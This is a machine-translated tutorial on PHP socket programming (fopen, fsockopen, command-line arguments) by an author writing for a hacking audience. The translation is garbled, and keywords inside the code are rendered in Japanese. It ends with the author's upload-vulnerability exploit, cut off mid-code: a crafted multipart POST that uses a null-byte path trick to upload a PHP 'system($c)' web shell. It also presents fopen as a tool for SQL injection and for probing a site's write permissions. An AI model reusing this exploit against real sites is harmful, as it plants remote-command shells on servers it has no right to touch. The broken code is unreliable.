PHP-SOCKETS 予備プログラミング_PHP チュートリアル

著者：darkness[bst]

msn:cqxy[at]21cn.net

私は 2 か月間 PHP を学習して多くのことを学びましたが、他の人たちとは異なり、socket.php の方が好きです。そこで、最も基本的なものから、socket_raw までの一連の php ソケットの読み取りメモを書くことにしました。例には、ポート転送 (ファイアウォールの突破)、動的ネットワーク タイプの exp、ポート スキャン、php バックドア、などが含まれます。勉強の都合上、1 週間に 1 つの記事しか書けませんが、皆さんが php シェル プログラミングに専念できることを願っています。世界で最も人気のあるスクリプト言語。 Webプログラミングで広く使用されています。何が言いたいかというと、phpはWebに優れているだけでなく、シェルにも優れているということです。ただ、人々は Perl を使ってシェル スクリプトを書くことに慣れているというだけです。私は PHP の専門家ではなく、PHP に触ってまだ数週間しか経っていないことをここで断っておきます。間違いがあればご指摘ください。私にメールを送って一緒に php について話し合うこともできます。

前提知識:

PHP について私が最も魅力を感じているのは、実際には、VB の Winsock を簡単に使用でき、VB を使用して一般的に使用される Winsock プログラムを作成できることです。それでも私はphpを選択しました。クロスプラットフォームだからです。

php はデフォルトでは高度なソケットをサポートしておらず、「カプセル化された」fsockopen などのいくつかの機能のみをサポートしています。 php の拡​​張機能として、それをサポートするようにソケットを設定する必要があります。 Windowsの場合はphpの設定が必要です。 ini、phpで。 ini で、「windows extensions」という行を見つけて、「extension=php_sockets.dll」の前にあるセミコロンを削除します。それで大丈夫です。 *nix では、コンパイル時に -enable-sockets コマンドを追加する必要があります。 dl() 関数を使用しない場合、php は php_sockets.dll と同じディレクトリにある必要があります。 OK、PHPソケットの設定は完了です。

以下は実行の問題です

ターミナルでphpスクリプトを実行するのは非常に簡単です。 Windows では c:phpphp.exe ╟q test.php、*nix では、Perl と同様に、php ファイルを php で実行するには事前に宣言する必要があります。 #!/usr/local/bin/php ╟q .、次に ./test.php のようになります。パラメータqはphpヘッダ情報を出力しないことを意味します。

入力パラメータの問題:

PHPシェルでパラメータを入力する方法を言う人がいます。 Web 上で次のようなパラメータを入力できます
http://xxx.com/aa.php?
パラメータ 1=xxxx&パラメータ 2=ssssss。 php が perl と同じであり、同様のパラメーター関数があることは問題ではありません。公式の説明を見てみましょう

"argv"

スクリプトに渡されるパラメータ。スクリプトがコマンド ライン モードで実行されると、argv 変数が C スタイルのコマンド ライン引数としてプログラムに渡されます。 get メソッドが呼び出されると、この変数には要求されたデータが含まれます。 "argc"

プログラムに渡されるコマンド ライン引数の数が含まれます (コマンド ライン モードで実行している場合)。



ははは、簡単に言えば。例を挙げてみましょう




以下はコードです:


if ($argc != 4 || in_array($argc[1] , array(--help,-h,?))) { エコー「暗闇の中で[bst]。すぐに戻ってきます! "; エコー " - - - - - - - - - - - - - - - - - - - - - - - - "; echo "c:/php/php.exe -q Uploadexp.php http://www.bugkidz.org/upload.php ファイルパス "; エコー " - - - - - - - - - - - - - - - - - - - - - - - - "; } $host = $argv[1]; $url = $argv[2]; $path = $argv[3]; ?>

[ctrl+a すべて選択]
理解していただけると思いますが、ここで argc[0] はプログラム自体を指します。次のようにすることもできます
print(%s,$argv[1]);

この短い段落を書くために正午に 1 時間を費やしました


前の段落では操作について説明しました。コマンドラインの。詳細については、

http://www.php.net/manual/zh/features.commandline.php



1を参照してください。 fopen
fopenのアプリケーションは、カプセル化されたソケット関数と呼ぶこともできます。ファイルの読み書きだけでなく、ソケットにも使用されます。 fopen は、他の高級言語の inet コントロール/クラスと同等であり、fsockopen と比較して、URL に対してより高度な操作を行います。 fopenの使い方
$s = fopen ($url, mode);
fopenのmode属性:
mode 説明
r ファイルポインタをファイルヘッダに向けて、読み取り専用モードで開きます。
r+ 読み取り/書き込みモードで開き、ファイル ポインターをファイル ヘッダーにポイントします。
w 書き込みモードで開き、ファイル ポインターをファイル ヘッダーにポイントし、ファイル サイズをゼロに切り捨てます。ファイルが存在しない場合は、作成してみてください。
w+ は読み取り/書き込みモードで開き、ファイル ポインターをファイル ヘッダーにポイントし、ファイル サイズをゼロに切り捨てます。ファイルが存在しない場合は、作成してみてください。
a 書き込みモードで開き、ファイル ポインタをファイルの末尾に指します。ファイルが存在しない場合は、作成してみてください。
a+ は読み取り/書き込みモードで開き、ファイル ポインターがファイルの末尾を指します。ファイルが存在しない場合は、作成してみてください。
x 作成して書き込み用に開き、ファイル ポインターをファイル ヘッダーにポイントします。ファイルが既に存在する場合、 fopen() 呼び出しは失敗して false を返し、e_warning レベルのエラー メッセージが生成されます。ファイルが存在しない場合は、作成してみてください。これは、基礎となる open(2) システム コールに o_excl|o_creat フラグを指定するのと同じです。このオプションは PHP 4.3.2 以降でサポートされており、ローカル ファイルにのみ使用できます。
x+ は、ファイル ポインターをファイル ヘッダーに向けて作成し、読み取りと書き込みのために開きます。ファイルが既に存在する場合、 fopen() 呼び出しは失敗して false を返し、e_warning レベルのエラー メッセージが生成されます。ファイルが存在しない場合は、作成してみてください。これは、基礎となる open(2) システム コールに o_excl|o_creat フラグを指定するのと同じです。このオプションは PHP 4.3.2 以降でサポートされており、ローカル ファイルにのみ使用できます。


ローカルファイル操作に使用され、inetにも使用できます。すごくクールじゃないですか？
Web サイトの iis ディレクトリに書き込み権限があるかどうかをテストしたいとします。
次のように書くことができます
$s = fopen("http://www.bugkidz.org","x+") または die("書き込み許可が存在しません")
それが存在する場合は、次のように書くことができます引き続き次のステートメントを作成します。 fwrite を使用してリモートでファイルを書き込みます。
ただし、一般的な Web サイトには読み取り専用の権限があります
$s =fopen("http://www.bugkidz.org/index.php?id=1","r");
このようにすると、読み込むことができます http://www.bugkidz.org/index.php?id=1 のコンテンツですが、完全なファイルのコンテンツを取得するには処理する必要があります
この方法
while (!feof($s)) {
echo fgets($ s, 1024);
}
SQL インジェクションには fopen が一番便利だと思います。
function phpinet($url)
{
fopen($url,"r") or die("URL を開くときにエラーが発生しました");


while (!feof($s)) {
$cahe = fgets($s , 1024);
}

retrun $cahe;
fclose($s)
}


この関数はvbのinet.openurlに相当します
fsockopenファミリー関数の使用
fsockopenはカプセル化されたソケット関数でもあります ．これは、VB の Winsock コントロールに似ています。残念ながら、アクティブなソケット接続はサポートされていますが、バインドやリッスンなどはサポートされていません。これらの関数を実装する必要がある場合は、PHP で高度なソケット プログラミングを使用する必要があります。それでも、 fsockopen 関数はほとんどのニーズを満たすことができます。
fsockopen は次のように使用します
resource fsockopen (string target, int port [, int errno [, string errstr [, float timeout]]])

例:
$sock = fsockopen("192.168.0.1",80,$errno , $errstr,30);
最初の 2 つはアドレスとポート、真ん中の 2 つはエラー関連の変数、最後の 2 つはタイムアウト設定です。
通常は $sock = fsockopen("192.168.0.1",80); で十分です。
$sock = fsockopen("192.168.0.1",80); これは典型的な TCP 接続です。 UDP 接続は次のようになります
$sock = fsockopen("udp://192.168.0.1",53);
これを使用して TFTP クライアントを記述することも可能です。

fsockopen アプリケーションの例:

例 1、単純な HTTP セッション。

コード


以下はコードです:
<?php $fp = fsockopen("<a href="http://www.example.com" target=_blank>www.example.com", 80, $errno, $errstr, 30); if (!$fp) { echo "$errstr ($errno)
"; } それ以外 { $out = "get/http/1.1 "; $out .= "ホスト: www.example.com "; $out .= "接続: 閉じます "; fwrite($fp, $out); while (!feof($fp)) { エコー fgets($fp, 128); } fclose($fp); } ?>
[ctrl+a 全選択]

大まかな流れはこんな感じ
fsockopenリソースを作成し、送信内容を定義し、fwrite関数またはfputs関数を使って定義内容を書き込み、取得した内容を出力ファイルの終わりに達するまでコンテンツを 1 行ずつ表示します。fgets 関数または fread を使用します。 fclose を使用して、作成した fsockopen リソースを閉じます。
ANGEL は PHP ポート スキャン ツールを作成して投稿しました
http://www.4ngel.net/article/20.htm

単純な EXP 送信フレームワークを作成するために fsockopen を選択することは間違いなく良いアイデアです。とても簡単です。
私の PHP アップロードの脆弱性エクスプロイトを見てください。

コード


以下はコードです:
<?php #codz by 闇 msn:cqxy[at]21cn.net $sock = fsockopen("<a href="http://www.ririririri.com" target=_blank>www.ririririri.com",80); if (!$靴下) { echo "接続できません!"; } $body = "--------------------------------7d41f4a600472 」。 "コンテンツの性質: フォームデータ; 名前="パス" 」。 」 」。 "<a href="http://www.ppp%00" target="_blank">www.ppp%00</a> 」。 "--------------------------------7d41f4a600472 」。 "コンテンツの配置: フォームデータ; 名前="画像"; ファイル名="f:tools1.gif" 」。 「コンテンツタイプ: テキスト/プレーン」 」。 」 」。 "<?php 」。 "システム($c); 」。 「？＞ 」。 「---------------------</p>」 <p align="left"></p> <div style="display:none;"> <span id="url" itemprop="url">http://www.bkjia.com/PHPjc/532676.html</span><span id="indexUrl" itemprop="indexUrl">www.bkjia.com</span><span id="isOriginal" itemprop="isOriginal">tru​​e</span><span id="isBasedOnUrl" itemprop="isBasedOnUrl">http://www.bkjia.com/PHPjc/532676.html</span><span id="genre" itemprop="genre">技術記事</span><span id="description" itemprop="description">著者: Darkness[bst] msn:cqxy[at]21cn.net 私は 2 か月間 PHP を学び、多くのことを学びましたが、他のものと違って、PHP にはソケットに関する記事が少なすぎるので、シリーズを書くことにしました。 ..</span> </div>